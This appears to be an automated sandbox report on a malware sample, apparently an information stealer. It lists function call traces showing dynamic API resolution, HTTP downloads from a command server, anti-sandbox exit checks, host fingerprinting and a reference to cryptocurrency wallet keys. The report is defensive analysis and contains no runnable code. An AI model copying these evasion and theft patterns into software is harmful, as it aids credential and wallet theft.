                                • GetProcAddress.KERNEL32(750F0000,01B8CCD0), ref: 00EDA2E3
                                • GetProcAddress.KERNEL32(750F0000,01B76720), ref: 00EDA2FC
                                • GetProcAddress.KERNEL32(750F0000,01B76A00), ref: 00EDA314
                                • GetProcAddress.KERNEL32(750F0000,01B7B1D0), ref: 00EDA32C
                                • GetProcAddress.KERNEL32(75A50000,01B8CCE8), ref: 00EDA352
                                • GetProcAddress.KERNEL32(75A50000,01B76760), ref: 00EDA36A
                                • GetProcAddress.KERNEL32(75A50000,01B88A40), ref: 00EDA382
                                • GetProcAddress.KERNEL32(75A50000,01B8CBC8), ref: 00EDA39B
                                • GetProcAddress.KERNEL32(75A50000,01B8CC28), ref: 00EDA3B3
                                • GetProcAddress.KERNEL32(75A50000,01B76980), ref: 00EDA3CB
                                • GetProcAddress.KERNEL32(75A50000,01B76960), ref: 00EDA3E4
                                • GetProcAddress.KERNEL32(75A50000,01B8CBF8), ref: 00EDA3FC
                                • GetProcAddress.KERNEL32(75A50000,01B8CD60), ref: 00EDA414
                                • GetProcAddress.KERNEL32(75070000,01B769C0), ref: 00EDA436
                                • GetProcAddress.KERNEL32(75070000,01B8CD18), ref: 00EDA44E
                                • GetProcAddress.KERNEL32(75070000,01B8CB08), ref: 00EDA466
                                • GetProcAddress.KERNEL32(75070000,01B8CDC0), ref: 00EDA47F
                                • GetProcAddress.KERNEL32(75070000,01B8CC70), ref: 00EDA497
                                • GetProcAddress.KERNEL32(74E50000,01B76940), ref: 00EDA4B8
                                • GetProcAddress.KERNEL32(74E50000,01B76A20), ref: 00EDA4D1
                                • GetProcAddress.KERNEL32(75320000,01B76880), ref: 00EDA4F2
                                • GetProcAddress.KERNEL32(75320000,01B8CD90), ref: 00EDA50A
                                • GetProcAddress.KERNEL32(6F060000,01B769A0), ref: 00EDA530
                                • GetProcAddress.KERNEL32(6F060000,01B76820), ref: 00EDA548
                                • GetProcAddress.KERNEL32(6F060000,01B76840), ref: 00EDA560
                                • GetProcAddress.KERNEL32(6F060000,01B8CD00), ref: 00EDA579
                                • GetProcAddress.KERNEL32(6F060000,01B76860), ref: 00EDA591
                                • GetProcAddress.KERNEL32(6F060000,01B769E0), ref: 00EDA5A9
                                • GetProcAddress.KERNEL32(6F060000,01B766E0), ref: 00EDA5C2
                                • GetProcAddress.KERNEL32(6F060000,01B76680), ref: 00EDA5DA
                                • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00EDA5F1
                                • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00EDA607
                                • GetProcAddress.KERNEL32(74E00000,01B8CD30), ref: 00EDA629
                                • GetProcAddress.KERNEL32(74E00000,01B88B10), ref: 00EDA641
                                • GetProcAddress.KERNEL32(74E00000,01B8CD48), ref: 00EDA659
                                • GetProcAddress.KERNEL32(74E00000,01B8CD78), ref: 00EDA672
                                • GetProcAddress.KERNEL32(74DF0000,01B766A0), ref: 00EDA693
                                • GetProcAddress.KERNEL32(6F950000,01B8CDA8), ref: 00EDA6B4
                                • GetProcAddress.KERNEL32(6F950000,01B766C0), ref: 00EDA6CD
                                • GetProcAddress.KERNEL32(6F950000,01B8CDD8), ref: 00EDA6E5
                                • GetProcAddress.KERNEL32(6F950000,01B8CAF0), ref: 00EDA6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 60820eeab104f5740b05a22b1d3c2882e192b71d68977f39c773e8b8d346bf67
                                • Instruction ID: 5363d1f480e521ee60601923a45c3fc1e8255b7e512b5ad92d5b683751ce2cc6
                                • Opcode Fuzzy Hash: 60820eeab104f5740b05a22b1d3c2882e192b71d68977f39c773e8b8d346bf67
                                • Instruction Fuzzy Hash: 21620AB5D10700AFC36EDBA8F99895637F9FF8C301714853AA626C324CD6BA95C1DB50
                                Function 00EC6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 ec6280-ec630b call eda7a0 call ec47b0 call eda740 InternetOpenA StrCmpCA 1040 ec630d 1033->1040 1041 ec6314-ec6318 1033->1041 1040->1041 1042 ec631e-ec6342 InternetConnectA 1041->1042 1043 ec6509-ec6525 call eda7a0 call eda800 * 2 1041->1043 1044 ec64ff-ec6503 InternetCloseHandle 1042->1044 1045 ec6348-ec634c 1042->1045 1061 ec6528-ec652d 1043->1061 1044->1043 1047 ec634e-ec6358 1045->1047 1048 ec635a 1045->1048 1050 ec6364-ec6392 HttpOpenRequestA 1047->1050 1048->1050 1053 ec6398-ec639c 1050->1053 1054 ec64f5-ec64f9 InternetCloseHandle 1050->1054 1056 ec639e-ec63bf InternetSetOptionA 1053->1056 1057 ec63c5-ec6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1044 1056->1057 1059 ec642c-ec644b call ed8940 1057->1059 1060 ec6407-ec6427 call eda740 call eda800 * 2 1057->1060 1066 ec644d-ec6454 1059->1066 1067 ec64c9-ec64e9 call eda740 call eda800 * 2 1059->1067 1060->1061 1071 ec6456-ec6480 InternetReadFile 1066->1071 1072 ec64c7-ec64ef InternetCloseHandle 1066->1072 1067->1061 1076 ec648b 1071->1076 1077 ec6482-ec6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 ec648d-ec64c5 call eda9b0 call eda8a0 call eda800 1077->1080 1080->1071
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                • StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EC63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC646D
                                • InternetCloseHandle.WININET(00000000), ref: 00EC64EF
                                • InternetCloseHandle.WININET(00000000), ref: 00EC64F9
                                • InternetCloseHandle.WININET(00000000), ref: 00EC6503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 1fc073191935304027b2bee37acd14ebe901e7a5b8307ad869d275574d6fae76
                                • Instruction ID: 4faf9c343916c4719918b08bc4c6ef8cee0c9e15235901a289acdbad909ce40d
                                • Opcode Fuzzy Hash: 1fc073191935304027b2bee37acd14ebe901e7a5b8307ad869d275574d6fae76
                                • Instruction Fuzzy Hash: 9E713B71A00358ABDB28DB90DC49FEE77B4FB44700F1091A9F50A7B284DBB56A86CF51
                                Function 00ED5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 ed5510-ed5577 call ed5ad0 call eda820 * 3 call eda740 * 4 1106 ed557c-ed5583 1090->1106 1107 ed5585-ed55b6 call eda820 call eda7a0 call ec1590 call ed51f0 1106->1107 1108 ed55d7-ed564c call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1106->1108 1124 ed55bb-ed55d2 call eda8a0 call eda800 1107->1124 1134 ed5693-ed56a9 call edaad0 StrCmpCA 1108->1134 1138 ed564e-ed568e call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1108->1138 1124->1134 1139 ed57dc-ed5844 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1134->1139 1140 ed56af-ed56b6 1134->1140 1138->1134 1270 ed5ac3-ed5ac6 1139->1270 1143 ed56bc-ed56c3 1140->1143 1144 ed57da-ed585f call edaad0 StrCmpCA 1140->1144 1148 ed571e-ed5793 call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1143->1148 1149 ed56c5-ed5719 call eda820 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1143->1149 1163 ed5865-ed586c 1144->1163 1164 ed5991-ed59f9 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1144->1164 1148->1144 1249 ed5795-ed57d5 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1148->1249 1149->1144 1170 ed598f-ed5a14 call edaad0 StrCmpCA 1163->1170 1171 ed5872-ed5879 1163->1171 1164->1270 1199 ed5a28-ed5a91 call eda8a0 call eda820 * 2 call ec1670 call eda800 * 4 call ed6560 call ec1550 1170->1199 1200 ed5a16-ed5a21 Sleep 1170->1200 1178 ed587b-ed58ce call eda820 call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1171->1178 1179 ed58d3-ed5948 call eda740 * 2 call ec1590 call ed52c0 call eda8a0 call eda800 call edaad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 ed594a-ed598a call eda7a0 call ec1590 call ed51f0 call eda8a0 call eda800 1179->1275 1199->1270 1200->1106 1249->1144 1275->1170
                                APIs
                                  • Part of subcall function 00EDA820: lstrlen.KERNEL32(00EC4F05,?,?,00EC4F05,00EE0DDE), ref: 00EDA82B
                                  • Part of subcall function 00EDA820: lstrcpy.KERNEL32(00EE0DDE,00000000), ref: 00EDA885
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED56A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5857
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00ED51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5228
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5318
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED532F
                                  • Part of subcall function 00ED52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00ED5364
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED5383
                                  • Part of subcall function 00ED52C0: lstrlen.KERNEL32(00000000), ref: 00ED53AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00ED5A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 34558fc43bf4df0f55cff4d29951a9c9adafeaa1c61537f50c9e6aad13c39bae
                                • Instruction ID: caff34d595388edf75ecb8cc2021cc3b39343bf0fb2775f94ad931a11aa03269
                                • Opcode Fuzzy Hash: 34558fc43bf4df0f55cff4d29951a9c9adafeaa1c61537f50c9e6aad13c39bae
                                • Instruction Fuzzy Hash: 74E188769102049ACB18FBA0ED56EED73B8EF54300F44A13AB41677285EF715B4BCB92
                                Function 00ED17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 ed17a0-ed17cd call edaad0 StrCmpCA 1304 ed17cf-ed17d1 ExitProcess 1301->1304 1305 ed17d7-ed17f1 call edaad0 1301->1305 1309 ed17f4-ed17f8 1305->1309 1310 ed17fe-ed1811 1309->1310 1311 ed19c2-ed19cd call eda800 1309->1311 1313 ed199e-ed19bd 1310->1313 1314 ed1817-ed181a 1310->1314 1313->1309 1316 ed18ad-ed18be StrCmpCA 1314->1316 1317 ed18cf-ed18e0 StrCmpCA 1314->1317 1318 ed198f-ed1999 call eda820 1314->1318 1319 ed1849-ed1858 call eda820 1314->1319 1320 ed1821-ed1830 call eda820 1314->1320 1321 ed185d-ed186e StrCmpCA 1314->1321 1322 ed187f-ed1890 StrCmpCA 1314->1322 1323 ed1835-ed1844 call eda820 1314->1323 1324 ed18f1-ed1902 StrCmpCA 1314->1324 1325 ed1951-ed1962 StrCmpCA 1314->1325 1326 ed1970-ed1981 StrCmpCA 1314->1326 1327 ed1913-ed1924 StrCmpCA 1314->1327 1328 ed1932-ed1943 StrCmpCA 1314->1328 1334 ed18ca 1316->1334 1335 ed18c0-ed18c3 1316->1335 1336 ed18ec 1317->1336 1337 ed18e2-ed18e5 1317->1337 1318->1313 1319->1313 1320->1313 1330 ed187a 1321->1330 1331 ed1870-ed1873 1321->1331 1332 ed189e-ed18a1 1322->1332 1333 ed1892-ed189c 1322->1333 1323->1313 1338 ed190e 1324->1338 1339 ed1904-ed1907 1324->1339 1344 ed196e 1325->1344 1345 ed1964-ed1967 1325->1345 1347 ed198d 1326->1347 1348 ed1983-ed1986 1326->1348 1340 ed1926-ed1929 1327->1340 1341 ed1930 1327->1341 1342 ed194f 1328->1342 1343 ed1945-ed1948 1328->1343 1330->1313 1331->1330 1353 ed18a8 1332->1353 1333->1353 1334->1313 1335->1334 1336->1313 1337->1336 1338->1313 1339->1338 1340->1341 1341->1313 1342->1313 1343->1342 1344->1313 1345->1344 1347->1313 1348->1347 1353->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00ED17C5
                                • ExitProcess.KERNEL32 ref: 00ED17D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 33bf15b12a95a4284cf5bdffeab5149d3f3ea99a69a57277f0c968c3013b0c8f
                                • Instruction ID: db48455c52308514dfd204463d916ba8bfe33c36e54f03c2610f40d69f7cbc11
                                • Opcode Fuzzy Hash: 33bf15b12a95a4284cf5bdffeab5149d3f3ea99a69a57277f0c968c3013b0c8f
                                • Instruction Fuzzy Hash: 8D515CB4A00209FFCB08DFA1D964ABE77B5EF84304F14609AE41677340D7B1AA92DB61
                                Function 00ED7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 ed7500-ed754a GetWindowsDirectoryA 1357 ed754c 1356->1357 1358 ed7553-ed75c7 GetVolumeInformationA call ed8d00 * 3 1356->1358 1357->1358 1365 ed75d8-ed75df 1358->1365 1366 ed75fc-ed7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ed75e1-ed75fa call ed8d00 1365->1367 1368 ed7619-ed7626 call eda740 1366->1368 1369 ed7628-ed7658 wsprintfA call eda740 1366->1369 1367->1365 1377 ed767e-ed768e 1368->1377 1369->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00ED7542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED760A
                                • wsprintfA.USER32 ref: 00ED7640
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$
                                • API String ID: 1544550907-3109660283
                                • Opcode ID: 28645bd24926bdf46ce1472992cfced0ca6bd9a87783de69025c004d2c84672f
                                • Instruction ID: c2028bef5224c297fe6cc0d200e299e3455a1a1d55021bc646953b282c8cee38
                                • Opcode Fuzzy Hash: 28645bd24926bdf46ce1472992cfced0ca6bd9a87783de69025c004d2c84672f
                                • Instruction Fuzzy Hash: A2418FB1D04358ABDB11DF94DC45BEEBBB8EF08704F10009AF50977280E774AA85CBA5
                                Function 00ED69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80750), ref: 00ED98A1
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B807B0), ref: 00ED98BA
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B806F0), ref: 00ED98D2
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80780), ref: 00ED98EA
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80570), ref: 00ED9903
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B88B00), ref: 00ED991B
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B76440), ref: 00ED9933
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B76300), ref: 00ED994C
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80768), ref: 00ED9964
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80708), ref: 00ED997C
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B80798), ref: 00ED9995
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B805B8), ref: 00ED99AD
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B76320), ref: 00ED99C5
                                  • Part of subcall function 00ED9860: GetProcAddress.KERNEL32(75900000,01B807C8), ref: 00ED99DE
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EC11D0: ExitProcess.KERNEL32 ref: 00EC1211
                                  • Part of subcall function 00EC1160: GetSystemInfo.KERNEL32(?), ref: 00EC116A
                                  • Part of subcall function 00EC1160: ExitProcess.KERNEL32 ref: 00EC117E
                                  • Part of subcall function 00EC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
                                  • Part of subcall function 00EC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
                                  • Part of subcall function 00EC1110: ExitProcess.KERNEL32 ref: 00EC1143
                                  • Part of subcall function 00EC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
                                  • Part of subcall function 00EC1220: __aulldiv.LIBCMT ref: 00EC1258
                                  • Part of subcall function 00EC1220: __aulldiv.LIBCMT ref: 00EC1266
                                  • Part of subcall function 00EC1220: ExitProcess.KERNEL32 ref: 00EC1294
                                  • Part of subcall function 00ED6770: GetUserDefaultLangID.KERNEL32 ref: 00ED6774
                                  • Part of subcall function 00EC1190: ExitProcess.KERNEL32 ref: 00EC11C6
                                  • Part of subcall function 00ED7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                  • Part of subcall function 00ED7850: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                  • Part of subcall function 00ED7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                  • Part of subcall function 00ED78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                  • Part of subcall function 00ED78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                  • Part of subcall function 00ED78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
